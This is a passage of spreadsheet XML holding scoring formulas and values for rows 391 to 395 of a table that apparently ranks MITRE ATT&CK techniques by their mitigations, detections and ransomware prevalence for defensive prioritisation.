      <c r="AT390" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU39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91" spans="1:47" ht="32.1">
      <c r="A391" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.2799999999999997E-2</v>
      </c>
      <c r="B391" s="25">
        <f>SUM(H391,M391,V391)*(1+SUM(AE391,AG391,AI391,AK391,AM391))</f>
        <v>0.22800000000000001</v>
      </c>
      <c r="C391" s="25" t="s">
        <v>1518</v>
      </c>
      <c r="D391" s="25" t="s">
        <v>271</v>
      </c>
      <c r="E391" s="25" t="s">
        <v>1519</v>
      </c>
      <c r="F391" s="51">
        <v>1</v>
      </c>
      <c r="G391" s="51">
        <v>1</v>
      </c>
      <c r="H391" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I391">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J391">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K391">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L391">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M391" s="25">
        <v>0</v>
      </c>
      <c r="N391" s="51">
        <v>0</v>
      </c>
      <c r="O391" s="51">
        <v>1</v>
      </c>
      <c r="P391" s="51">
        <v>0</v>
      </c>
      <c r="Q391" s="51">
        <v>0</v>
      </c>
      <c r="R391" s="51">
        <v>2.5</v>
      </c>
      <c r="S391" s="51">
        <v>1</v>
      </c>
      <c r="T391" s="52" t="s">
        <v>319</v>
      </c>
      <c r="U391" s="51">
        <v>6</v>
      </c>
      <c r="V391" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>7.1428571428571425E-2</v>
      </c>
      <c r="W391">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>7</v>
      </c>
      <c r="X391">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.12727272727272726</v>
      </c>
      <c r="Y391">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.12727272727272726</v>
      </c>
      <c r="Z391">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA391">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB391">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC391" s="29" t="s">
        <v>1520</v>
      </c>
      <c r="AD391" s="25" t="str" cm="1">
        <f t="array" ref="AD391">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC391)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE391" s="25">
        <f>IF(AD391="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF391" s="25" t="str" cm="1">
        <f t="array" ref="AF391">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC391)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG391" s="25">
        <f>IF(AF391="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH391" s="25" t="str" cm="1">
        <f t="array" ref="AH391">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC391)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI391" s="25">
        <f>IF(AH391="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ391" s="25" t="str" cm="1">
        <f t="array" ref="AJ391">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC391)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK391" s="25">
        <f>IF(AJ391="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL391" s="25" t="str" cm="1">
        <f t="array" ref="AL391">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC391)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM391" s="25">
        <f>IF(AL391="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN391" s="60">
        <v>0</v>
      </c>
      <c r="AO391" s="51">
        <v>0</v>
      </c>
      <c r="AP391" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.2799999999999997E-2</v>
      </c>
      <c r="AQ391" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>7.5999999999999998E-2</v>
      </c>
      <c r="AR391" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>7.5999999999999998E-2</v>
      </c>
      <c r="AS391" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT391" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU39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92" spans="1:47" ht="80.099999999999994">
      <c r="A392" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.0537142857142855E-2</v>
      </c>
      <c r="B392" s="25">
        <f>SUM(H392,M392,V392)*(1+SUM(AE392,AG392,AI392,AK392,AM392))</f>
        <v>0.20537142857142857</v>
      </c>
      <c r="C392" s="25" t="s">
        <v>1521</v>
      </c>
      <c r="D392" s="25" t="s">
        <v>129</v>
      </c>
      <c r="E392" s="25" t="s">
        <v>1522</v>
      </c>
      <c r="F392" s="51">
        <v>1</v>
      </c>
      <c r="G392" s="51">
        <v>1</v>
      </c>
      <c r="H392" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I392">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J392">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K392">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L392">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M392" s="25">
        <v>0</v>
      </c>
      <c r="N392" s="51">
        <v>0</v>
      </c>
      <c r="O392" s="51">
        <v>2</v>
      </c>
      <c r="P392" s="51">
        <v>1</v>
      </c>
      <c r="Q392" s="51">
        <v>0</v>
      </c>
      <c r="R392" s="52" t="s">
        <v>491</v>
      </c>
      <c r="S392" s="51">
        <v>2</v>
      </c>
      <c r="T392" s="52" t="s">
        <v>1523</v>
      </c>
      <c r="U392" s="51">
        <v>4</v>
      </c>
      <c r="V392" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>7.1428571428571425E-2</v>
      </c>
      <c r="W392">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>6</v>
      </c>
      <c r="X392">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.10909090909090909</v>
      </c>
      <c r="Y392">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.10909090909090909</v>
      </c>
      <c r="Z392">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>3</v>
      </c>
      <c r="AA392">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.03</v>
      </c>
      <c r="AB392">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.03</v>
      </c>
      <c r="AC392" s="29" t="s">
        <v>1524</v>
      </c>
      <c r="AD392" s="25" t="str" cm="1">
        <f t="array" ref="AD392">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC392)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE392" s="25">
        <f>IF(AD392="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF392" s="25" t="str" cm="1">
        <f t="array" ref="AF392">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC392)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG392" s="25">
        <f>IF(AF392="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH392" s="25" t="str" cm="1">
        <f t="array" ref="AH392">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC392)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI392" s="25">
        <f>IF(AH392="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ392" s="25" t="str" cm="1">
        <f t="array" ref="AJ392">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC392)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AK392" s="25">
        <f>IF(AJ392="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AL392" s="25" t="str" cm="1">
        <f t="array" ref="AL392">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC392)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM392" s="25">
        <f>IF(AL392="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN392" s="60">
        <v>0</v>
      </c>
      <c r="AO392" s="51">
        <v>0</v>
      </c>
      <c r="AP392" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.0537142857142855E-2</v>
      </c>
      <c r="AQ392" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>6.8457142857142855E-2</v>
      </c>
      <c r="AR392" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>6.8457142857142855E-2</v>
      </c>
      <c r="AS392" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT392" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU39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93" spans="1:47" ht="63.95">
      <c r="A393" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.1555</v>
      </c>
      <c r="B393" s="25">
        <f>SUM(H393,M393,V393)*(1+SUM(AE393,AG393,AI393,AK393,AM393))</f>
        <v>0.22166666666666671</v>
      </c>
      <c r="C393" s="25" t="s">
        <v>1525</v>
      </c>
      <c r="D393" s="25" t="s">
        <v>1290</v>
      </c>
      <c r="E393" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F393" s="51">
        <v>1</v>
      </c>
      <c r="G393" s="51">
        <v>1</v>
      </c>
      <c r="H393" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I393">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J393">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K393">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L393">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M393" s="25">
        <v>0</v>
      </c>
      <c r="N393" s="51">
        <v>0</v>
      </c>
      <c r="O393" s="51">
        <v>0</v>
      </c>
      <c r="P393" s="51">
        <v>0</v>
      </c>
      <c r="Q393" s="51">
        <v>0</v>
      </c>
      <c r="R393" s="53" t="s">
        <v>423</v>
      </c>
      <c r="S393" s="51">
        <v>3</v>
      </c>
      <c r="T393" s="51" t="s">
        <v>1526</v>
      </c>
      <c r="U393" s="51">
        <v>4</v>
      </c>
      <c r="V393" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>6.6666666666666666E-2</v>
      </c>
      <c r="W393">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>7</v>
      </c>
      <c r="X393">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.12727272727272726</v>
      </c>
      <c r="Y393">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.12727272727272726</v>
      </c>
      <c r="Z393">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA393">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB393">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC393" s="29" t="s">
        <v>107</v>
      </c>
      <c r="AD393" s="25" t="str" cm="1">
        <f t="array" ref="AD393">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC393)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE393" s="25">
        <f>IF(AD393="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF393" s="25" t="str" cm="1">
        <f t="array" ref="AF393">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC393)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG393" s="25">
        <f>IF(AF393="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH393" s="25" t="str" cm="1">
        <f t="array" ref="AH393">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC393)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI393" s="25">
        <f>IF(AH393="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ393" s="25" t="str" cm="1">
        <f t="array" ref="AJ393">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC393)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK393" s="25">
        <f>IF(AJ393="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL393" s="25" t="str" cm="1">
        <f t="array" ref="AL393">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC393)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM393" s="25">
        <f>IF(AL393="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN393" s="61">
        <v>4</v>
      </c>
      <c r="AO393" s="51">
        <v>1</v>
      </c>
      <c r="AP393" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.1555</v>
      </c>
      <c r="AQ393" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>7.3888888888888907E-2</v>
      </c>
      <c r="AR393" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>7.3888888888888907E-2</v>
      </c>
      <c r="AS393" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AT393" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AU39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94" spans="1:47" ht="32.1">
      <c r="A394" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.33E-2</v>
      </c>
      <c r="B394" s="25">
        <f>SUM(H394,M394,V394)*(1+SUM(AE394,AG394,AI394,AK394,AM394))</f>
        <v>0.19966666666666669</v>
      </c>
      <c r="C394" s="25" t="s">
        <v>1527</v>
      </c>
      <c r="D394" s="25" t="s">
        <v>894</v>
      </c>
      <c r="E394" s="25" t="s">
        <v>1528</v>
      </c>
      <c r="F394" s="51">
        <v>1</v>
      </c>
      <c r="G394" s="51">
        <v>1</v>
      </c>
      <c r="H394" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I394">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J394">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K394">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L394">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M394" s="25">
        <v>0</v>
      </c>
      <c r="N394" s="51">
        <v>0</v>
      </c>
      <c r="O394" s="51">
        <v>0</v>
      </c>
      <c r="P394" s="51">
        <v>0</v>
      </c>
      <c r="Q394" s="51">
        <v>0</v>
      </c>
      <c r="R394" s="52" t="s">
        <v>161</v>
      </c>
      <c r="S394" s="51">
        <v>7</v>
      </c>
      <c r="T394" s="51"/>
      <c r="U394" s="51">
        <v>0</v>
      </c>
      <c r="V394" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>6.6666666666666666E-2</v>
      </c>
      <c r="W394">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>7</v>
      </c>
      <c r="X394">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.12727272727272726</v>
      </c>
      <c r="Y394">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.12727272727272726</v>
      </c>
      <c r="Z394">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA394">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB394">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC394" s="29" t="s">
        <v>206</v>
      </c>
      <c r="AD394" s="25" t="str" cm="1">
        <f t="array" ref="AD394">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC394)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE394" s="25">
        <f>IF(AD394="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF394" s="25" t="str" cm="1">
        <f t="array" ref="AF394">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC394)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG394" s="25">
        <f>IF(AF394="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH394" s="25" t="str" cm="1">
        <f t="array" ref="AH394">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC394)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI394" s="25">
        <f>IF(AH394="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ394" s="25" t="str" cm="1">
        <f t="array" ref="AJ394">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC394)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK394" s="25">
        <f>IF(AJ394="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL394" s="25" t="str" cm="1">
        <f t="array" ref="AL394">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC394)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM394" s="25">
        <f>IF(AL394="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN394" s="52">
        <v>1</v>
      </c>
      <c r="AO394" s="51">
        <v>1</v>
      </c>
      <c r="AP394" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.33E-2</v>
      </c>
      <c r="AQ394" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>6.6555555555555562E-2</v>
      </c>
      <c r="AR394" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>6.6555555555555562E-2</v>
      </c>
      <c r="AS394" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT394" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU39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95" spans="1:47" ht="32.1">
      <c r="A395" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.2166666666666671E-2</v>
      </c>
      <c r="B395" s="25">
        <f>SUM(H395,M395,V395)*(1+SUM(AE395,AG395,AI395,AK395,AM395))</f>
        <v>0.22166666666666671</v>
      </c>
      <c r="C395" s="25" t="s">
        <v>1529</v>
      </c>
      <c r="D395" s="25" t="s">
        <v>119</v>
      </c>
      <c r="E395" s="25" t="s">
        <v>1530</v>
      </c>
      <c r="F395" s="51">
        <v>1</v>
      </c>
      <c r="G395" s="51">
        <v>1</v>
      </c>
      <c r="H395" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I395">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J395">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K395">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L395">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M395" s="25">
        <v>0</v>
      </c>
      <c r="N395" s="51">
        <v>0</v>
      </c>
      <c r="O395" s="51">
        <v>0</v>
